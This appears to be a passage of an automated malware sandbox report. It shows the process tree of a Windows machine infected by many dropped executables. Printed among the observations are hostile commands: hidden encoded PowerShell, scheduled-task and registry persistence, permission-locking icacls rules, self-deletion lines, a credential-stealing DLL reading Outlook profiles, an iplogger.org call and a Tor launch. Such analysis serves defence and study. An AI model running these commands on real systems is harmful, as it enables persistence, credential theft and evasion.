                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:4316
                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Checks computer location settings
                                                                    • Adds Run key to start application
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4960
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==
                                                                      5⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2908
                                                                    • C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe"
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:1424
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      5⤵
                                                                        PID:5984
                                                                  • C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:3232
                                                                    • C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:3840
                                                                      • C:\Users\Admin\AppData\Local\Temp\M52CB.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\M52CB.exe"
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:2616
                                                                        • C:\Users\Admin\AppData\Local\Temp\M52CB.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\M52CB.exe"
                                                                          6⤵
                                                                            PID:4688
                                                                        • C:\Users\Admin\AppData\Local\Temp\0BB4J.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:3784
                                                                          • C:\Users\Admin\AppData\Local\Temp\0BB4J.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Adds Run key to start application
                                                                            PID:4204
                                                                        • C:\Users\Admin\AppData\Local\Temp\EH46E.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\EH46E.exe"
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Checks computer location settings
                                                                          PID:5536
                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                            "C:\Windows\System32\regsvr32.exe" -u rMbC4.Q /S
                                                                            6⤵
                                                                              PID:5348
                                                                          • C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe
                                                                            https://iplogger.org/1x5az7
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Modifies Internet Explorer settings
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:5640
                                                                          • C:\Users\Admin\AppData\Local\Temp\0B7121CH132B0JI.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:4320
                                                                          • C:\Users\Admin\AppData\Local\Temp\IHH9FGG6KIID6CG.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:2596
                                                                      • C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Checks computer location settings
                                                                        PID:3680
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          "C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\AppVerif\DllHelper.exe"
                                                                          4⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:5768
                                                                        • C:\Users\Admin\AppVerif\DllHelper.exe
                                                                          "C:\Users\Admin\AppVerif\DllHelper.exe"
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:3180
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                            5⤵
                                                                              PID:1180
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"
                                                                            4⤵
                                                                              PID:1816
                                                                              • C:\Windows\SysWOW64\chcp.com
                                                                                chcp 65001
                                                                                5⤵
                                                                                  PID:440
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping 127.0.0.1
                                                                                  5⤵
                                                                                  • Runs ping.exe
                                                                                  PID:6000
                                                                            • C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4040
                                                                            • C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:3964
                                                                              • C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Checks computer location settings
                                                                                • Adds Run key to start application
                                                                                • Modifies system certificate store
                                                                                PID:4552
                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                  icacls "C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                  5⤵
                                                                                  • Modifies file permissions
                                                                                  PID:3300
                                                                                • C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:5584
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks computer location settings
                                                                                    PID:5716
                                                                                    • C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe
                                                                                      "C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4116
                                                                                      • C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe
                                                                                        "C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks processor information in registry
                                                                                        PID:5624
                                                                            • C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Checks computer location settings
                                                                              PID:1216
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 452
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:2332
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 764
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:3832
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 772
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:2380
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 816
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:2156
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 824
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:4324
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 956
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:5156
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1016
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:5316
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1356
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:5732
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe" & exit
                                                                                4⤵
                                                                                  PID:6064
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f
                                                                                    5⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:5268
                                                                              • C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Adds Run key to start application
                                                                                PID:2712
                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                  attrib -?
                                                                                  4⤵
                                                                                  • Views/modifies file attributes
                                                                                  PID:5056
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c cmd < Inebriarti.htm & ping -n 5 localhost
                                                                                  4⤵
                                                                                    PID:3788
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd
                                                                                      5⤵
                                                                                        PID:4460
                                                                                        • C:\Windows\SysWOW64\tasklist.exe
                                                                                          tasklist /FI "imagename eq PSUAService.exe"
                                                                                          6⤵
                                                                                          • Enumerates processes with tasklist
                                                                                          PID:5084
                                                                                        • C:\Windows\SysWOW64\find.exe
                                                                                          find /I /N "psuaservice.exe"
                                                                                          6⤵
                                                                                            PID:5912
                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                            findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm
                                                                                            6⤵
                                                                                              PID:79052
                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
                                                                                              Tal.exe.pif H
                                                                                              6⤵
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              • Suspicious use of SendNotifyMessage
                                                                                              PID:109144
                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
                                                                                                C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
                                                                                                7⤵
                                                                                                  PID:5356
                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                ping localhost -n 5
                                                                                                6⤵
                                                                                                • Runs ping.exe
                                                                                                PID:109156
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping -n 5 localhost
                                                                                              5⤵
                                                                                              • Runs ping.exe
                                                                                              PID:109376
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks computer location settings
                                                                                          • Loads dropped DLL
                                                                                          • Checks processor information in registry
                                                                                          PID:3244
                                                                                          • C:\ProgramData\50543188494393494002.exe
                                                                                            "C:\ProgramData\50543188494393494002.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks computer location settings
                                                                                            PID:5800
                                                                                            • C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe"
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks computer location settings
                                                                                              PID:3288
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\
                                                                                                6⤵
                                                                                                  PID:376
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\
                                                                                                    7⤵
                                                                                                      PID:5888
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
                                                                                                    6⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:4700
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\110809d565579c\cred.dll, Main
                                                                                                    6⤵
                                                                                                    • Blocklisted process makes network request
                                                                                                    • Loads dropped DLL
                                                                                                    • Accesses Microsoft Outlook profiles
                                                                                                    • outlook_win_path
                                                                                                    PID:4832
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 1108
                                                                                                  5⤵
                                                                                                  • Program crash
                                                                                                  PID:876
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe" & del C:\ProgramData\*.dll & exit
                                                                                                4⤵
                                                                                                  PID:2400
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f
                                                                                                    5⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:6060
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout /t 6
                                                                                                    5⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:3196
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 1928
                                                                                                  4⤵
                                                                                                  • Program crash
                                                                                                  PID:4624
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2520
                                                                                                • C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:2020
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:5060
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1216 -ip 1216
                                                                                            1⤵
                                                                                              PID:3636
                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                              1⤵
                                                                                                PID:1296
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1216 -ip 1216
                                                                                                1⤵
                                                                                                  PID:3368
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1216 -ip 1216
                                                                                                  1⤵
                                                                                                    PID:4980
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1216 -ip 1216
                                                                                                    1⤵
                                                                                                      PID:3744
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1216 -ip 1216
                                                                                                      1⤵
                                                                                                        PID:2380
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1216 -ip 1216
                                                                                                        1⤵
                                                                                                          PID:756
                                                                                                        • C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe
                                                                                                          "C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:4324
                                                                                                          • C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe
                                                                                                            "C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5224
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1216 -ip 1216
                                                                                                          1⤵
                                                                                                            PID:5244
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2284 -ip 2284
                                                                                                            1⤵
                                                                                                              PID:5380
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1216 -ip 1216
                                                                                                              1⤵
                                                                                                                PID:5696
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1744 -ip 1744
                                                                                                                1⤵
                                                                                                                  PID:5968
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3244 -ip 3244
                                                                                                                  1⤵
                                                                                                                    PID:4332
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5800 -ip 5800
                                                                                                                    1⤵
                                                                                                                      PID:5680
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                      1⤵
                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                      PID:5248
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3608 -ip 3608
                                                                                                                      1⤵
                                                                                                                        PID:1156
                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 472 -p 5436 -ip 5436
                                                                                                                        1⤵
                                                                                                                          PID:5660
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3608 -ip 3608
                                                                                                                          1⤵
                                                                                                                            PID:2076
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3608 -ip 3608
                                                                                                                            1⤵
                                                                                                                              PID:3468
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3608 -ip 3608
                                                                                                                              1⤵
                                                                                                                                PID:2004
                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                1⤵
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                PID:5748
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:5512
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 608
                                                                                                                                    3⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:5116
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5512 -ip 5512
                                                                                                                                1⤵
                                                                                                                                  PID:4152
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3608 -ip 3608
                                                                                                                                  1⤵
                                                                                                                                    PID:5304
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3608 -ip 3608
                                                                                                                                    1⤵
                                                                                                                                      PID:4376
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3608 -ip 3608
                                                                                                                                      1⤵
                                                                                                                                        PID:5280
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                        1⤵
                                                                                                                                          PID:376
                                                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                            2⤵
                                                                                                                                              PID:6860
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3608 -ip 3608
                                                                                                                                            1⤵
                                                                                                                                              PID:1180
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3A8A.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\3A8A.exe
                                                                                                                                              1⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks computer location settings
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:4452
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==
                                                                                                                                                2⤵
                                                                                                                                                  PID:5304
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3A8A.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\3A8A.exe
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3972
                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2476
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 872
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:452
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2476 -ip 2476
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2488
                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2952
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4A1B.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\4A1B.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:1260
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4A1B.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\4A1B.exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Checks computer location settings
                                                                                                                                                          PID:5340
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4A1B.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            PID:3880
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4A1B.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              PID:6076
                                                                                                                                                              • C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:4980
                                                                                                                                                                • C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:3760
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:6116
